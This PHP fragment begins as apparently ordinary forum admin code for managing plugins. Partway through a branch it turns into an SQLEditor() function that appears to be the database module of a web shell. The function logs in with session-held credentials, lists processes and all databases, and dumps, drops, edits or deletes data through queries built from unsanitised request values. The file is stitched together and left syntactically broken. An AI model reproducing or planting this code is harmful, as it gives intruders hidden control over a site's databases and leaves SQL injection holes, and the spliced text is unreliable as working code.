$navMenu->setupnav('hack_'.$key);
}
*/
$db_hackdb[$key] = array(stripslashes($value), $key);
}
}
setConfig('db_hackdb', $db_hackdb);
updatecache_c();
//$navMenu->cache();
adminmsg('operate_success');
} elseif ($action == 'delete') {
InitGP(array('id'));
empty($db_hackdb[$id]) && adminmsg('hackcenter_del');
unset($db_hackdb[$id]);
$sqlarray = file_exists(R_P . "hack/{$id}/sql.txt") ? FileArray($id) : array();
!empty($sqlarray) && SQLDrop($sqlarray);
setConfig('db_hackdb', $db_hackdb);
$navMenu = L::loadClass('navmenu');
$navMenu->settype('bbs_navinfo');
$navMenu->del('hack_' . $id);
$navMenu->cache();
adminmsg('operate_success');
} elseif ($action == 'add') {
InitGP(array('hackdir', 'hackname', 'hackopen'), 'G');
!empty($db_hackdb[$hackdir]) && adminmsg('hackcenter_sign_exists');
$sqlarray = file_exists(R_P . "hack/{$hackdir}/sql.txt") ? FileArray($hackdir) : array();
!empty($sqlarray) && SQLCreate($sqlarray);
$db_hackdb[$hackdir] = array($hackname, $hackdir, $hackopen);
setConfig('db_hackdb', $db_hackdb);
$navMenu = L::loadClass('navmenu');
$navMenu->settype('bbs_navinfo');
function SQLEditor()
{
extract($_SESSION);
$conn = @mysql_connect($mhost . ":" . $mport, $muser, $mpass);
if ($conn) {
echo "Logged in as {$muser}@{$mhost} <a href='{$self}?act=logout'>[Logout]</a><center>";
echo "<form method='POST' action='{$self}?'>\n Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>\n <input type='hidden' name='db' value='{$_GET['db']}'>\n <input type='submit' value='Go' name='sql'>\n </form>";
echo "<form action='{$self}?act=sqledit' method='post'>\n <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>\n </form></center></br></br>";
if (isset($_POST['sql_list_proc'])) {
$res = mysql_list_processes();
echo "<table style='margin: auto; text-align: center;'><tr>\n <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>\n </tr>";
while ($r = mysql_fetch_assoc($res)) {
echo "<tr><td>{$r['Id']}</td><td>{$r['Host']}</td><td>{$r['db']}</td><td>{$r['Command']}</td><td>{$r['Time']}</td></tr>";
}
mysql_free_result($res);
echo "</table></br>";
}
if (!isset($_GET['db'])) {
if (isset($_POST['dbc'])) {
db_create();
}
if (isset($_GET['dropdb'])) {
SQLDrop();
}
echo "<table style='margin: auto; text-align: center;'>\n <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
$all_your_base = mysql_list_dbs($conn);
while ($your_base = mysql_fetch_assoc($all_your_base)) {
$tbl = mysql_query("SHOW TABLES FROM {$your_base['Database']}");
$tbl_count = mysql_num_rows($tbl);
echo "<tr><td><a href='{$self}?act=sqledit&db={$your_base['Database']}'>{$your_base['Database']}</td><td>{$tbl_count}</td><td><a href='{$self}?act=download&db={$your_base['Database']}'>Download</a></td><td><a href='{$self}?act=sqledit&dropdb={$your_base['Database']}'>Drop</a></td></tr>";
}
echo "</table></br><center><form action='{$self}?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
} elseif (isset($_GET['db']) && !isset($_GET['tbl'])) {
if (isset($_POST['tblc'])) {
table_create();
}
if (isset($_GET['droptbl'])) {
SQLDrop();
}
echo "<table style='margin: auto; text-align: center;'>\n <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
$tables = mysql_query("SHOW TABLES FROM {$_GET['db']}");
while ($tblc = mysql_fetch_array($tables)) {
$fCount = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$tblc['0']}");
$fc = mysql_num_rows($fCount);
echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$tblc['0']}'>{$tblc['0']}</a></td><td>{$fc}</td><td><a href='{$self}?act=download&db={$_GET['db']}&tbl={$tblc['0']}'>Dump</td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&droptbl={$tblc['0']}'>Drop</a></td></tr>";
}
echo "</table></br><center><form action='{$self}?act=sqledit&db={$_GET['db']}' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='{$_GET['db']}' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
} elseif (isset($_GET['field']) && isset($_POST['sqlsave'])) {
$discard_values = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
$values = mysql_fetch_assoc($discard_values);
$keys = array_keys($values);
$values = array();
foreach ($_POST as $k => $v) {
if (in_array($k, $keys)) {
$values[] = $v;
}
}
$query = "UPDATE {$_GET['db']}.{$_GET['tbl']} SET ";
for ($y = 0; $y < count($values); $y++) {
if ($y == count($values) - 1) {
$query .= "{$keys[$y]}='{$values[$y]}' ";
} else {
$query .= "{$keys[$y]}='{$values[$y]}', ";
}
}
$query .= "WHERE {$_GET['field']} = '{$_GET['v']}'";
$try = mysql_query($query) or die(mysql_error());
echo "<center>Table updated!<br>";
echo "<a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}'>Go back</a><br><br>";
} elseif (isset($_GET['field']) && isset($_GET['v']) && !isset($_GET['del'])) {
echo "<center><form action='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$_GET['field']}&v={$_GET['v']}' method='post'>";
$sql_fields = array();
$fields = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
while ($field = mysql_fetch_assoc($fields)) {
$sql_fields[] = $field['Field'];
}
$data = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
$d_piece = mysql_fetch_assoc($data);
for ($m = 0; $m < count($sql_fields); $m++) {
$point = $sql_fields[$m];
echo "{$point}: <input type='text' value='{$d_piece[$point]}' name='{$sql_fields[$m]}'></br>";
}
echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
} elseif (isset($_GET['db']) && isset($_GET['tbl'])) {
if (isset($_GET['insert'])) {
SQLInsert();
}
if (isset($_GET['field']) && isset($_GET['v']) && isset($_GET['del'])) {
echo "<center>";
if (@mysql_query("DELETE FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}={$_GET['v']}")) {
echo "Row deleted</br>";
} else {
echo "Failed to delete row</br>";
}
echo "</center>";
}
echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&insert=1'>[Insert new row]</a></center>";
echo "<table style='margin: auto; text-align: center;'><tr>";
$cols = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
$fields = array();
while ($col = mysql_fetch_assoc($cols)) {
array_push($fields, $col['Field']);
echo "<td>{$col['Field']}</td>";
}
echo "</tr>";
if (isset($_GET['s']) && is_numeric($_GET['s'])) {
$selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT {$_GET['s']}, 250");
} else {
$selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT 0, 250");
}
while ($select = mysql_fetch_row($selector)) {
echo "<tr>";
for ($i = 0; $i < count($fields); $i++) {
echo "<td>" . htmlspecialchars($select[$i]) . "</td>";
}
echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}'>Edit</a></td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}&del=true'>Delete</a></td>";
echo "</tr>";
}
echo "</table>";
echo "<table style='margin: auto;'>";
if (isset($_GET['s'])) {
$prev = intval($_GET['s']) - 250;
$next = intval($_GET['s']) + 250;
if ($_GET['s'] > 0) {
echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$prev}'>Previous</a></td>";
}
if (mysql_num_rows($selector) > 249) {
echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$next}'>Next</a></td></tr>";
}
} else {
echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s=250'>Next</a></center>";
}
echo "</table>";
} else {
$_SESSION = array();
session_destroy();
header("Location: {$self}?act=sql");
}
}
}